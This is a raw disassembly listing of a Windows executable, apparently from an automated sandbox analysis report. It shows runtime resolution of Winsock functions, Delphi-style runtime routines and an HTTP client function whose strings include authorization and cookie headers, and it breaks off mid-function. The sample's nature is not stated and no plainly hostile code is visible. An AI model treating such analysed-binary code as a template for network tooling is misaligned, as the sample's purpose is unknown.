004148AA mov dword ptr [0042B400h], eax
004148AF push 00414BC4h ASCII "sendto"
004148B4 mov eax, dword ptr [ebx]
004148B6 push eax
004148B7 call 004061D4h
004148BC mov dword ptr [0042B3FCh], eax
004148C1 push 00414BCCh ASCII "setsockopt"
004148C6 mov eax, dword ptr [ebx]
004148C8 push eax
004148C9 call 004061D4h
004148CE mov dword ptr [0042B3F4h], eax
004148D3 push 00414BD8h ASCII "shutdown"
004148D8 mov eax, dword ptr [ebx]
004148DA push eax
004148DB call 004061D4h
004148E0 mov dword ptr [0042B3F0h], eax
004148E5 push 00414BE4h ASCII "socket"
004148EA mov eax, dword ptr [ebx]
004148EC push eax
004148ED call 004061D4h
004148F2 mov dword ptr [0042B444h], eax
004148F7 push 00414BECh ASCII "gethostbyaddr"
004148FC mov eax, dword ptr [ebx]
004148FE push eax
004148FF call 004061D4h
00414904 mov dword ptr [0042B3E8h], eax
00414909 push 00414BFCh ASCII "gethostbyname"
0041490E mov eax, dword ptr [ebx]
00414910 push eax
00414911 call 004061D4h
00414916 mov dword ptr [0042B3E4h], eax
0041491B push 00414C0Ch ASCII "getprotobyname"
00414920 mov eax, dword ptr [ebx]
00414922 push eax
00414923 call 004061D4h
00414928 mov dword ptr [0042B3DCh], eax
0041492D push 00414C1Ch ASCII "getprotobynumber"
00414932 mov eax, dword ptr [ebx]
00414934 push eax
00414935 call 004061D4h
0041493A mov dword ptr [0042B3E0h], eax
0041493F push 00414C30h ASCII "getservbyname"
00414944 mov eax, dword ptr [ebx]
00414946 push eax
00414947 call 004061D4h
0041494C mov dword ptr [0042B3D4h], eax
00414951 push 00414C40h ASCII "getservbyport"
00414956 mov eax, dword ptr [ebx]
00414958 push eax
00414959 call 004061D4h
0041495E mov dword ptr [0042B3D8h], eax
00414963 push 00414C50h ASCII "gethostname"
00414968 mov eax, dword ptr [ebx]
0041496A push eax
0041496B call 004061D4h
00414970 mov dword ptr [0042B3ECh], eax
00414975 push 00414C5Ch ASCII "getaddrinfo"
0041497A mov eax, dword ptr [ebx]
0041497C push eax
0041497D call 004061D4h
00414982 mov dword ptr [0042B44Ch], eax
00414987 push 00414C68h ASCII "freeaddrinfo"
0041498C mov eax, dword ptr [ebx]
0041498E push eax
0041498F call 004061D4h
00414994 mov dword ptr [0042B450h], eax
00414999 push 00414C78h ASCII "getnameinfo"
0041499E mov eax, dword ptr [ebx]
004149A0 push eax
004149A1 call 004061D4h
004149A6 mov dword ptr [0042B454h], eax
004149AB cmp dword ptr [0042B44Ch], 00000000h
004149B2 je 004149C6h
004149B4 cmp dword ptr [0042B450h], 00000000h
004149BB je 004149C6h
004149BD cmp dword ptr [0042B454h], 00000000h
004149C4 jne 004149CAh
004149C6 xor eax, eax xrefs 004149B2, 004149BB
004149C8 jmp 004149CCh
004149CA mov al, 01h xrefs 004149C4
004149CC mov byte ptr [0042C8A8h], al xrefs 004149C8
004149D1 cmp byte ptr [0042C8A8h], 00000000h
004149D8 jne 00414A57h
004149DA push 00414C84h ASCII "wship6.dll"
004149DF call 00406244h
004149E4 mov dword ptr [0042B468h], eax
004149E9 cmp dword ptr [0042B468h], 00000000h
004149F0 je 00414A57h
004149F2 push 00414C5Ch ASCII "getaddrinfo"
004149F7 mov eax, dword ptr [0042B468h] 00000000
004149FC push eax
004149FD call 004061D4h
00414A02 mov dword ptr [0042B44Ch], eax
00414A07 push 00414C68h ASCII "freeaddrinfo"
00414A0C mov eax, dword ptr [0042B468h] 00000000
00414A11 push eax
00414A12 call 004061D4h
00414A17 mov dword ptr [0042B450h], eax
00414A1C push 00414C78h ASCII "getnameinfo"
00414A21 mov eax, dword ptr [0042B468h] 00000000
00414A26 push eax
00414A27 call 004061D4h
00414A2C mov dword ptr [0042B454h], eax
00414A31 cmp dword ptr [0042B44Ch], 00000000h
00414A38 je 00414A4Ch
00414A3A cmp dword ptr [0042B450h], 00000000h
00414A41 je 00414A4Ch
00414A43 cmp dword ptr [0042B454h], 00000000h
00414A4A jne 00414A50h
00414A4C xor eax, eax xrefs 00414A38, 00414A41
00414A4E jmp 00414A52h
00414A50 mov al, 01h xrefs 00414A4A
00414A52 mov byte ptr [0042C8A9h], al xrefs 00414A4E
00414A57 mov byte ptr [ebp-05h], 00000001h xrefs 004149D8, 004149F0
00414A5B jmp 00414A61h
00414A5D mov byte ptr [ebp-05h], 00000001h xrefs 004146D2
00414A61 cmp byte ptr [ebp-05h], 00000000h xrefs 004146F9, 00414A5B
00414A65 je 00414A6Dh
00414A67 inc dword ptr [0042B460h]
00414A6D xor eax, eax xrefs 00414A65
00414A6F pop edx
00414A71 pop ecx Count = 2
00414A72 mov dword ptr fs:[eax], edx
00414A75 push 00414A8Ch
00414A7A mov eax, dword ptr [0042C8A4h] 00960A4C xrefs 00414A8A
00414A7F call 0041391Ch
00414A84 ret function end
Function 0041F410, API count: 0, instr count: 8
Address Instruction Meta Information
0041F410 push ebx xrefs 0041F48B, 0041F497, 0041F4A8
0041F411 mov ebx, eax
0041F413 mov eax, ebx
0041F415 call 00404878h
0041F41A push eax
0041F41B call 00406244h
0041F420 pop ebx
0041F421 ret function end
Non-executed Functions
Function 004040C4, API count: 0, instr count: 12
Address Instruction Meta Information
004040C4 mov dword ptr [0042C014h], 004011C8h xrefs 00406072
004040CE mov dword ptr [0042C018h], 004011D8h
004040D8 mov dword ptr [0042C638h], eax
004040DD xor eax, eax
004040DF mov dword ptr [0042C63Ch], eax
004040E4 mov dword ptr [0042C640h], edx
004040EA mov eax, dword ptr [edx+04h]
004040ED mov dword ptr [0042C02Ch], eax
004040F2 call 00403FBCh
004040F7 mov byte ptr [0042C034h], 00000000h
004040FE call 00404064h
00404103 ret function end
Function 0040B64C, API count: 2, instr count: 95
APIs
    • GetCPInfo.KERNEL32, ref: 0040B5ED
  • GetStringTypeExA.KERNEL32, ref: 0040B740
  • GetSystemMetrics.USER32, ref: 0040B76B
Address Instruction Meta Information
0040B64C push ebp xrefs 0040B7DE
0040B64D mov ebp, esp
0040B64F add esp, FFFFFE68h
0040B655 push ebx
0040B656 push esi
0040B657 push edi
0040B658 mov dword ptr [0042C738h], 00000409h
0040B662 mov dword ptr [0042C73Ch], 00000009h
0040B66C mov dword ptr [0042C740h], 00000001h
0040B676 call 004061ECh
0040B67B test eax, eax
0040B67D je 0040B684h
0040B67F mov dword ptr [0042C738h], eax
0040B684 test ax, ax xrefs 0040B67D
0040B687 je 0040B6A4h
0040B689 mov edx, eax
0040B68B and dx, 03FFh
0040B690 movzx edx, dx
0040B693 mov dword ptr [0042C73Ch], edx
0040B699 movzx eax, ax
0040B69C shr eax, 0Ah
0040B69F mov dword ptr [0042C740h], eax
0040B6A4 mov esi, 0040B7A0h xrefs 0040B687
0040B6A9 mov edi, 0042B130h
0040B6AE mov ecx, 00000008h
0040B6B3 rep movsd
0040B6B5 cmp dword ptr [0042B0E8h], 02h
0040B6BC jne 0040B769h
0040B6C2 call 0040B634h
0040B6C7 test al, al
0040B6C9 je 0040B6DEh
0040B6CB mov byte ptr [0042C745h], 00000000h
0040B6D2 mov byte ptr [0042C744h], 00000000h
0040B6D9 jmp 0040B797h
0040B6DE push ebp xrefs 0040B6C9
0040B6DF call 0040B5D4h
0040B6E4 pop ecx
0040B6E5 mov eax, 0042B130h
0040B6EA mov edx, 0040B7A0h
0040B6EF mov cl, 20h
0040B6F1 call 00403270h
0040B6F6 setne bl
0040B6F9 mov byte ptr [0042C744h], bl
0040B6FF test bl, bl
0040B701 je 0040B70Fh
0040B703 mov byte ptr [0042C745h], 00000000h
0040B70A jmp 0040B797h
0040B70F mov eax, 00000080h xrefs 0040B701
0040B714 lea edx, dword ptr [ebp-00000094h]
0040B71A mov byte ptr [edx], al xrefs 0040B723
0040B71C inc eax
0040B71D inc edx
0040B71E cmp eax, 00000100h
0040B723 jne 0040B71Ah
0040B725 lea eax, dword ptr [ebp-00000094h]
0040B72B lea edx, dword ptr [ebp-00000196h]
0040B731 push edx
0040B732 push 00000080h
0040B737 push eax
0040B738 push 00000002h
0040B73A mov eax, dword ptr [0042C738h] 00000409
0040B73F push eax
0040B740 call 004061E4h GetStringTypeExA@KERNEL32.DLL (Hidden Import)
0040B745 mov eax, 00000080h
0040B74A lea edx, dword ptr [ebp-00000196h]
0040B750 cmp word ptr [edx], 0002h xrefs 0040B765
0040B754 sete cl
0040B757 mov byte ptr [0042C745h], cl
0040B75D test cl, cl
0040B75F jne 0040B797h
0040B761 add edx, 02h
0040B764 dec eax
0040B765 jne 0040B750h
0040B767 jmp 0040B797h
0040B769 push 0000004Ah xrefs 0040B6BC
0040B76B call 004062BCh GetSystemMetrics@USER32.DLL (Hidden Import)
0040B770 test eax, eax
0040B772 setne al
0040B775 mov byte ptr [0042C745h], al
0040B77A push 0000002Ah
0040B77C call 004062BCh
0040B781 test eax, eax
0040B783 setne bl
0040B786 mov byte ptr [0042C744h], bl
0040B78C test bl, bl
0040B78E je 0040B797h
0040B790 push ebp
0040B791 call 0040B5D4h
0040B796 pop ecx
0040B797 pop edi xrefs 0040B78E, 0040B75F, 0040B767, 0040B70A, 0040B6D9
0040B798 pop esi
0040B799 pop ebx
0040B79A mov esp, ebp
0040B79C pop ebp
0040B79D ret function end
Function 00418720, API count: 0, instr count: 107
Address Instruction Meta Information
00418720 push ebp xrefs 0041C3E9
00418721 mov ebp, esp
00418723 add esp, FFFFFFE8h
00418726 push ebx
00418727 push esi
00418728 push edi
00418729 xor ebx, ebx
0041872B mov dword ptr [ebp-18h], ebx
0041872E mov esi, ecx
00418730 mov dword ptr [ebp-04h], edx
00418733 mov ebx, eax
00418735 xor eax, eax
00418737 push ebp
00418738 push 0041886Ah
0041873D push dword ptr fs:[eax]
00418740 mov dword ptr fs:[eax], esp
00418743 xor eax, eax
00418745 mov dword ptr [ebp-08h], eax
00418748 mov eax, ebx
0041874A call 004186ECh
0041874F test al, al
00418751 jne 00418854h
00418757 push esi
00418758 mov ecx, dword ptr [ebp-04h]
0041875B mov dl, 01h
0041875D mov eax, ebx
0041875F call 00419F3Ch
00418764 mov dword ptr [ebp-10h], esi
00418767 xor eax, eax
00418769 mov dword ptr [ebp-0Ch], eax
0041876C mov eax, dword ptr [ebp-0Ch]
0041876F cmp eax, dword ptr [ebp-10h]
00418772 jnl 0041884Dh
00418778 mov esi, dword ptr [ebp-10h] xrefs 00418847
0041877B sub esi, dword ptr [ebp-0Ch]
0041877E mov eax, dword ptr [ebx+000001A4h]
00418784 cmp esi, eax
00418786 jle 0041878Ah
00418788 mov esi, eax
0041878A test esi, esi xrefs 00418786
0041878C jng 0041884Dh
00418792 lea eax, dword ptr [ebx+7Ch]
00418795 push eax
00418796 mov ecx, dword ptr [ebx+78h]
00418799 mov edx, esi
0041879B mov eax, ebx
0041879D call 004185FCh
004187A2 mov edx, dword ptr [ebp-0Ch]
004187A5 mov eax, dword ptr [ebp-04h]
004187A8 call 004159A0h
004187AD mov dword ptr [ebp-14h], eax
004187B0 push 00000000h
004187B2 mov ecx, esi
004187B4 mov edx, dword ptr [ebp-14h]
004187B7 mov eax, dword ptr [ebx+000001B4h]
004187BD call 00413AD8h
004187C2 mov edi, eax
004187C4 mov edx, edi
004187C6 mov eax, ebx
004187C8 mov ecx, dword ptr [eax]
004187CA call dword ptr [ecx+78h]
004187CD cmp dword ptr [ebx+000001B8h], 00002733h
004187D7 jne 00418816h
004187D9 mov edx, dword ptr [ebx+000001ACh]
004187DF mov eax, ebx
004187E1 mov ecx, dword ptr [eax]
004187E3 call dword ptr [ecx+00000094h]
004187E9 test al, al
004187EB je 0041880Ch
004187ED push 00000000h
004187EF mov ecx, esi
004187F1 mov edx, dword ptr [ebp-14h]
004187F4 mov eax, dword ptr [ebx+000001B4h]
004187FA call 00413AD8h
004187FF mov edi, eax
00418801 mov edx, edi
00418803 mov eax, ebx
00418805 mov ecx, dword ptr [eax]
00418807 call dword ptr [ecx+78h]
0041880A jmp 00418816h
0041880C mov dword ptr [ebx+000001B8h], 0000274Ch xrefs 004187EB
00418816 cmp dword ptr [ebx+000001B8h], 00000000h xrefs 004187D7, 0041880A
0041881D jne 0041884Dh
0041881F add dword ptr [ebp-0Ch], edi
00418822 add dword ptr [ebp-08h], edi
00418825 add dword ptr [ebx+000001A0h], edi
0041882B lea edx, dword ptr [ebp-18h]
0041882E mov eax, edi
00418830 call 004074CCh
00418835 mov ecx, dword ptr [ebp-18h]
00418838 mov dl, 0Bh
0041883A mov eax, ebx
0041883C call 00419E70h
00418841 mov eax, dword ptr [ebp-0Ch]
00418844 cmp eax, dword ptr [ebp-10h]
00418847 jl 00418778h
0041884D mov eax, ebx xrefs 00418772, 0041878C, 0041881D
0041884F call 0041952Ch
00418854 xor eax, eax xrefs 00418751
00418856 pop edx
00418858 pop ecx Count = 2
00418859 mov dword ptr fs:[eax], edx
0041885C push 00418871h
00418861 lea eax, dword ptr [ebp-18h] xrefs 0041886F
00418864 call 004043DCh
00418869 ret function end
Function 004041DC, API count: 3, instr count: 38
APIs
  • GetStdHandle.KERNEL32, ref: 00404215
  • WriteFile.KERNEL32, ref: 0040421B
  • MessageBoxA.USER32, ref: 00404254
Strings
  • Error, va: 0042B08C
  • Runtime error at 00000000, va: 0042B094
Address Instruction Meta Information
004041DC push ecx xrefs 004042A5
004041DD cmp byte ptr [0042C044h], 00000000h
004041E4 je 0040423Dh
004041E6 cmp word ptr [0042C218h], D7B2h
004041EF jne 00404205h
004041F1 cmp dword ptr [0042C220h], 00000000h
004041F8 jbe 00404205h
004041FA mov eax, 0042C214h
004041FF call dword ptr [0042C230h]
00404205 push 00000000h xrefs 004041EF, 004041F8
00404207 lea eax, dword ptr [esp+04h]
0040420B push eax
0040420C push 0000001Eh
0040420E push 0042B094h ASCII "Runtime error at 00000000"
00404213 push FFFFFFF5h
00404215 call 004011C0h GetStdHandle@KERNEL32.DLL (Hidden Import)
0040421A push eax
0040421B call 004011F8h WriteFile@KERNEL32.DLL (Hidden Import)
00404220 push 00000000h
00404222 lea eax, dword ptr [esp+04h]
00404226 push eax
00404227 push 00000002h
00404229 push 00404264h
0040422E push FFFFFFF5h
00404230 call 004011C0h
00404235 push eax
00404236 call 004011F8h
0040423B pop edx
0040423C ret function end
0040423D cmp byte ptr [0042B034h], 00000000h xrefs 004041E4
00404244 jne 00404259h
00404246 push 00000000h
00404248 push 0042B08Ch ASCII "Error"
0040424D push 0042B094h ASCII "Runtime error at 00000000"
00404252 push 00000000h
00404254 call 00401220h MessageBoxA@USER32.DLL (Hidden Import)
00404259 pop edx xrefs 00404244
0040425A ret function end
Function 00402FE4, API count: 1, instr count: 29
APIs
  • GetFileSize.KERNEL32, ref: 00403000
Address Instruction Meta Information
00402FE4 push ebx xrefs 00402F87
00402FE5 push esi
00402FE6 mov ebx, eax
00402FE8 or esi, FFFFFFFFh
00402FEB mov ax, word ptr [ebx+04h]
00402FEF cmp ax, 0000D7B0h
00402FF3 jbe 0040301Eh
00402FF5 cmp ax, 0000D7B3h
00402FF9 jnbe 0040301Eh
00402FFB push 00000000h
00402FFD mov eax, dword ptr [ebx]
00402FFF push eax
00403000 call 004011B8h GetFileSize@KERNEL32.DLL (Hidden Import)
00403005 mov esi, eax
00403007 cmp esi, FFFFFFFFh
0040300A jne 00403013h
0040300C call 00402820h
00403011 jmp 00403028h
00403013 mov eax, esi xrefs 0040300A
00403015 xor edx, edx
00403017 div dword ptr [ebx+08h]
0040301A mov esi, eax
0040301C jmp 00403028h
0040301E mov eax, 00000067h xrefs 00402FF3, 00402FF9
00403023 call 00402810h
00403028 mov eax, esi xrefs 0040301C, 00403011
0040302A pop esi
0040302B pop ebx
0040302C ret function end
Function 0040A444, API count: 0, instr count: 148
Strings
  • yyyy, va: 0040A638
  • eeee, va: 0040A648
  • ggg, va: 0040A634
Address Instruction Meta Information
0040A444 push ebp xrefs 0040B8DC, 0040B909
0040A445 mov ebp, esp
0040A447 xor ecx, ecx
0040A44D push ecx Count = 5
0040A44E push ebx
0040A44F push esi
0040A450 push edi
0040A451 mov edi, edx
0040A453 mov esi, eax
0040A455 xor eax, eax
0040A457 push ebp
0040A458 push 0040A60Eh
0040A45D push dword ptr fs:[eax]
0040A460 mov dword ptr fs:[eax], esp
0040A463 mov ebx, 00000001h
0040A468 mov eax, edi
0040A46A call 004043DCh
0040A46F lea eax, dword ptr [ebp-08h]
0040A472 push eax
0040A473 call 004061ECh
0040A478 mov ecx, 0040A624h
0040A47D mov edx, 00001009h
0040A482 call 0040A10Ch
0040A487 mov eax, dword ptr [ebp-08h]
0040A48A mov edx, 00000001h
0040A48F call 00407608h
0040A494 add eax, FFFFFFFDh
0040A497 sub eax, 03h
0040A49A jc 0040A5E4h
0040A4A0 mov eax, dword ptr [0042C73Ch] 00000009
0040A4A5 sub eax, 04h
0040A4A8 je 0040A4B6h
0040A4AA add eax, FFFFFFF3h
0040A4AD sub eax, 02h
0040A4B0 jc 0040A4B6h
0040A4B2 xor eax, eax
0040A4B4 jmp 0040A4B8h
0040A4B6 mov al, 01h xrefs 0040A4A8, 0040A4B0
0040A4B8 test al, al xrefs 0040A4B4
0040A4BA je 0040A4F1h
0040A4BC jmp 0040A4E1h
0040A4BE mov al, byte ptr [esi+ebx-01h] xrefs 0040A4EA
0040A4C2 sub al, 47h
0040A4C4 je 0040A4E0h
0040A4C6 sub al, 20h
0040A4C8 je 0040A4E0h
0040A4CA lea eax, dword ptr [ebp-0Ch]
0040A4CD mov dl, byte ptr [esi+ebx-01h]
0040A4D1 call 004045C4h
0040A4D6 mov edx, dword ptr [ebp-0Ch]
0040A4D9 mov eax, edi
0040A4DB call 00404680h
0040A4E0 inc ebx xrefs 0040A4C4, 0040A4C8
0040A4E1 mov eax, esi xrefs 0040A4BC
0040A4E3 call 00404678h
0040A4E8 cmp ebx, eax
0040A4EA jle 0040A4BEh
0040A4EC jmp 0040A5F3h
0040A4F1 mov eax, edi xrefs 0040A4BA
0040A4F3 mov edx, esi
0040A4F5 call 00404430h
0040A4FA jmp 0040A5F3h
0040A4FF mov al, byte ptr [esi+ebx-01h] xrefs 0040A5ED
0040A503 and eax, 000000FFh
0040A508 bt dword ptr [0042B130h], eax
0040A50F jnc 0040A53Fh
0040A511 mov edx, ebx
0040A513 mov eax, esi
0040A515 call 0040B3A8h
0040A51A mov dword ptr [ebp-04h], eax
0040A51D lea eax, dword ptr [ebp-10h]
0040A520 push eax
0040A521 mov ecx, dword ptr [ebp-04h]
0040A524 mov edx, ebx
0040A526 mov eax, esi
0040A528 call 004048D8h
0040A52D mov edx, dword ptr [ebp-10h]
0040A530 mov eax, edi
0040A532 call 00404680h
0040A537 add ebx, dword ptr [ebp-04h]
0040A53A jmp 0040A5E4h
0040A53F mov edx, 0040A628h xrefs 0040A50F
0040A544 lea eax, dword ptr [esi+ebx-01h]
0040A548 mov ecx, 00000002h
0040A54D call 00407B1Ch
0040A552 test eax, eax
0040A554 jne 0040A565h
0040A556 mov eax, edi
0040A558 mov edx, 0040A634h ASCII "ggg"
0040A55D call 00404680h
0040A562 inc ebx
0040A563 jmp 0040A5E3h
0040A565 mov edx, 0040A638h ASCII "yyyy" xrefs 0040A554
0040A56A lea eax, dword ptr [esi+ebx-01h]
0040A56E mov ecx, 00000004h
0040A573 call 00407B1Ch
0040A578 test eax, eax
0040A57A jne 0040A58Dh
0040A57C mov eax, edi
0040A57E mov edx, 0040A648h ASCII "eeee"
0040A583 call 00404680h
0040A588 add ebx, 03h
0040A58B jmp 0040A5E3h
0040A58D mov edx, 0040A650h xrefs 0040A57A
0040A592 lea eax, dword ptr [esi+ebx-01h]
0040A596 mov ecx, 00000002h
0040A59B call 00407B1Ch
0040A5A0 test eax, eax
0040A5A2 jne 0040A5B3h
0040A5A4 mov eax, edi
0040A5A6 mov edx, 0040A65Ch
0040A5AB call 00404680h
0040A5B0 inc ebx
0040A5B1 jmp 0040A5E3h
0040A5B3 mov al, byte ptr [esi+ebx-01h] xrefs 0040A5A2
0040A5B7 sub al, 59h
0040A5B9 je 0040A5BFh
0040A5BB sub al, 20h
0040A5BD jne 0040A5CDh
0040A5BF mov eax, edi xrefs 0040A5B9
0040A5C1 mov edx, 0040A668h
0040A5C6 call 00404680h
0040A5CB jmp 0040A5E3h
0040A5CD lea eax, dword ptr [ebp-14h] xrefs 0040A5BD
0040A5D0 mov dl, byte ptr [esi+ebx-01h]
0040A5D4 call 004045C4h
0040A5D9 mov edx, dword ptr [ebp-14h]
0040A5DC mov eax, edi
0040A5DE call 00404680h
0040A5E3 inc ebx xrefs 0040A5CB, 0040A5B1, 0040A58B, 0040A563
0040A5E4 mov eax, esi xrefs 0040A49A, 0040A53A
0040A5E6 call 00404678h
0040A5EB cmp ebx, eax
0040A5ED jng 0040A4FFh
0040A5F3 xor eax, eax xrefs 0040A4FA, 0040A4EC
0040A5F5 pop edx
0040A5F7 pop ecx Count = 2
0040A5F8 mov dword ptr fs:[eax], edx
0040A5FB push 0040A615h
0040A600 lea eax, dword ptr [ebp-14h] xrefs 0040A613
0040A603 mov edx, 00000004h
0040A608 call 00404400h
0040A60D ret function end
Function 00407A10, API count: 1, instr count: 21
APIs
  • GetFullPathNameA.KERNEL32, ref: 00407A2F
Address Instruction Meta Information
00407A10 push ebx xrefs 0041234F, 004122EA
00407A11 push esi
00407A12 add esp, FFFFFEF8h
00407A18 mov esi, edx
00407A1A mov ebx, eax
00407A1C push esp
00407A1D lea eax, dword ptr [esp+08h]
00407A21 push eax
00407A22 push 00000104h
00407A27 mov eax, ebx
00407A29 call 00404878h
00407A2E push eax
00407A2F call 004061A4h GetFullPathNameA@KERNEL32.DLL (Hidden Import)
00407A34 mov ecx, eax
00407A36 lea edx, dword ptr [esp+04h]
00407A3A mov eax, esi
00407A3C call 004044CCh
00407A41 add esp, 00000108h
00407A47 pop esi
00407A48 pop ebx
00407A49 ret function end
Function 0040BCE0, API count: 1, instr count: 11
APIs
  • GetCurrentThreadId.KERNEL32, ref: 0040BCE4
Address Instruction Meta Information
0040BCE0 push ebp xrefs 0040BD04, 0040BD85
0040BCE1 mov ebp, esp
0040BCE3 push ecx
0040BCE4 call 00406184h GetCurrentThreadId@KERNEL32.DLL (Hidden Import)
0040BCE9 mov word ptr [ebp-02h], ax
0040BCED mov al, byte ptr [ebp-02h]
0040BCF0 xor al, byte ptr [ebp-01h]
0040BCF3 and al, 0Fh
0040BCF5 pop ecx
0040BCF6 pop ebp
0040BCF7 ret function end
Function 00412EFC, API count: 1, instr count: 11
APIs
    • ResetEvent.KERNEL32, ref: 00412EF6
  • WaitForSingleObject.KERNEL32, ref: 00412F06
Address Instruction Meta Information
00412EFC push ebx xrefs 00412F85
00412EFD mov ebx, eax
00412EFF push ebx
00412F00 mov eax, dword ptr [0042C848h] 00000048
00412F05 push eax
00412F06 call 0040629Ch WaitForSingleObject@KERNEL32.DLL (Hidden Import)
00412F0B test eax, eax
00412F0D jne 00412F14h
00412F0F call 00412EF0h
00412F14 pop ebx xrefs 00412F0D
00412F15 ret function end
Function 0040A678, API count: 3, instr count: 102
APIs
  • VirtualQuery.KERNEL32, ref: 0040A695
  • GetModuleFileNameA.KERNEL32, ref: 0040A6D4
  • LoadStringA.USER32, ref: 0040A76A
Address Instruction Meta Information
0040A678 push ebp xrefs 0040A80F
0040A679 mov ebp, esp
0040A67B add esp, FFFFFBA8h
0040A681 push ebx
0040A682 push esi
0040A683 push edi
0040A684 mov dword ptr [ebp-04h], ecx
0040A687 mov ebx, edx
0040A689 mov esi, eax
0040A68B push 0000001Ch
0040A68D lea eax, dword ptr [ebp-00000330h]
0040A693 push eax
0040A694 push ebx
0040A695 call 00406294h VirtualQuery@KERNEL32.DLL (Hidden Import)
0040A69A cmp dword ptr [ebp-00000320h], 00001000h
0040A6A4 jne 0040A6C2h
0040A6A6 push 00000105h
0040A6AB lea eax, dword ptr [ebp-00000212h]
0040A6B1 push eax
0040A6B2 mov eax, dword ptr [ebp-0000032Ch]
0040A6B8 push eax
0040A6B9 call 004061C4h
0040A6BE test eax, eax
0040A6C0 jne 0040A6E5h
0040A6C2 push 00000105h xrefs 0040A6A4
0040A6C7 lea eax, dword ptr [ebp-00000212h]
0040A6CD push eax
0040A6CE mov eax, dword ptr [0042C660h] 00400000
0040A6D3 push eax
0040A6D4 call 004061C4h GetModuleFileNameA@KERNEL32.DLL (Hidden Import)
0040A6D9 mov eax, ebx
0040A6DB call 0040A66Ch
0040A6E0 mov dword ptr [ebp-08h], eax
0040A6E3 jmp 0040A6EEh
0040A6E5 sub ebx, dword ptr [ebp-0000032Ch] xrefs 0040A6C0
0040A6EB mov dword ptr [ebp-08h], ebx
0040A6EE lea eax, dword ptr [ebp-00000212h] xrefs 0040A6E3
0040A6F4 mov dl, 5Ch
0040A6F6 call 0040B4F8h
0040A6FB mov edx, eax
0040A6FD inc edx
0040A6FE lea eax, dword ptr [ebp-0000010Dh]
0040A704 mov ecx, 00000104h
0040A709 call 00407AE8h
0040A70E mov ebx, 0040A7F8h
0040A713 mov edi, 0040A7F8h
0040A718 mov eax, esi
0040A71A mov edx, dword ptr [00406664h] 004066B0
0040A720 call 00403894h
0040A725 test al, al
0040A727 je 0040A74Ah
0040A729 mov eax, dword ptr [esi+04h]
0040A72C call 00404878h
0040A731 mov ebx, eax
0040A733 mov eax, ebx
0040A735 call 00407AC0h
0040A73A test eax, eax
0040A73C je 0040A74Ah
0040A73E cmp byte ptr [ebx+eax-01h], 0000002Eh
0040A743 je 0040A74Ah
0040A745 mov edi, 0040A7FCh
0040A74A push 00000100h xrefs 0040A727, 0040A73C, 0040A743
0040A74F lea eax, dword ptr [ebp-00000312h]
0040A755 push eax
0040A756 mov eax, dword ptr [0042B968h] 00406414
0040A75B mov eax, dword ptr [eax+04h]
0040A75E push eax
0040A75F mov eax, dword ptr [0042C660h] 00400000
0040A764 call 00405328h
0040A769 push eax
0040A76A call 004062C4h LoadStringA@USER32.DLL (Hidden Import)
0040A76F lea edx, dword ptr [ebp-00000458h]
0040A775 mov eax, dword ptr [esi]
0040A777 call 00403680h
0040A77C lea eax, dword ptr [ebp-00000458h]
0040A782 mov dword ptr [ebp-00000358h], eax
0040A788 mov byte ptr [ebp-00000354h], 00000004h
0040A78F lea eax, dword ptr [ebp-0000010Dh]
0040A795 mov dword ptr [ebp-00000350h], eax
0040A79B mov byte ptr [ebp-0000034Ch], 00000006h
0040A7A2 mov eax, dword ptr [ebp-08h]
0040A7A5 mov dword ptr [ebp-00000348h], eax
0040A7AB mov byte ptr [ebp-00000344h], 00000005h
0040A7B2 mov dword ptr [ebp-00000340h], ebx
0040A7B8 mov byte ptr [ebp-0000033Ch], 00000006h
0040A7BF mov dword ptr [ebp-00000338h], edi
0040A7C5 mov byte ptr [ebp-00000334h], 00000006h
0040A7CC lea eax, dword ptr [ebp-00000358h]
0040A7D2 push eax
0040A7D3 push 00000004h
0040A7D5 lea ecx, dword ptr [ebp-00000312h]
0040A7DB mov edx, dword ptr [ebp+08h]
0040A7DE mov eax, dword ptr [ebp-04h]
0040A7E1 call 00408008h
0040A7E6 mov eax, dword ptr [ebp-04h]
0040A7E9 call 00407AC0h
0040A7EE pop edi
0040A7EF pop esi
0040A7F0 pop ebx
0040A7F1 mov esp, ebp
0040A7F3 pop ebp
0040A7F4 retn 0004h function end
Function 0041D0E8, API count: 0, instr count: 999
Strings
  • HTTPS, va: 0041DE54
  • Range: bytes=, va: 0041DEDC
  • Connection: close, va: 0041DF68
  • Host: , va: 0041DFF8
  • 0.9, va: 0041E02C
  • HTTP/, va: 0041E044
  • 1.1, va: 0041DE64
  • CONTENT-LENGTH:, va: 0041E070
  • CONTENT-TYPE:, va: 0041E088
  • TRANSFER-ENCODING:, va: 0041E0A0
  • CONNECTION:, va: 0041E0F8
  • CLOSE, va: 0041E0E8
  • PROXY-CONNECTION:, va: 0041E0CC
  • CHUNKED, va: 0041E0BC
  • HTTP/, va: 0041E054
  • ://, va: 0041E008
  • Proxy-Authorization: Basic , va: 0041DFB0
  • Authorization: Basic , va: 0041DF90
  • Connection: keep-alive, va: 0041DF30
  • Keep-Alive: , va: 0041DF50
  • Proxy-, va: 0041DF20
  • Cookie: , va: 0041DF0C
  • User-Agent: , va: 0041DEC4
  • Content-Length: , va: 0041DE90
  • Content-Type: , va: 0041DEAC
  • Expect: 100-continue, va: 0041DE70
Address Instruction Meta Information
0041D0E8 push ebp xrefs 00428A68, 00428BB4, 00428F44, 00429104
0041D0E9 mov ebp, esp
0041D0EB push ecx
0041D0EC mov ecx, 0000001Eh
0041D0F3 push 00000000h Count = 2
0041D0F5 dec ecx
0041D0F6 jne 0041D0F1h
0041D0F8 xchg dword ptr [ebp-04h], ecx
0041D0FB push ebx
0041D0FC push esi
0041D0FD push edi
0041D0FE mov ebx, ecx
0041D100 mov dword ptr [ebp-08h], edx
0041D103 mov dword ptr [ebp-04h], eax
0041D106 xor eax, eax
0041D108 push ebp
0041D109 push 0041DE37h
0041D10E push dword ptr fs:[eax]
0041D111 mov dword ptr fs:[eax], esp
0041D114 mov byte ptr [ebp-09h], 00000000h
0041D118 mov eax, dword ptr [ebp-04h]
0041D11B mov dword ptr [eax+58h], 000001F4h
0041D122 mov eax, dword ptr [ebp-04h]
0041D125 add eax, 5Ch
0041D128 call 004043DCh
0041D12D mov eax, dword ptr [ebp-04h]
0041D130 xor edx, edx
0041D132 mov dword ptr [eax+68h], edx
0041D135 mov eax, dword ptr [ebp-04h]
0041D138 xor edx, edx
0041D13A mov dword ptr [eax+6Ch], edx
0041D13D lea eax, dword ptr [ebp-24h]
0041D140 push eax
0041D141 lea eax, dword ptr [ebp-28h]
0041D144 push eax
0041D145 lea eax, dword ptr [ebp-2Ch]
0041D148 push eax
0041D149 lea eax, dword ptr [ebp-30h]
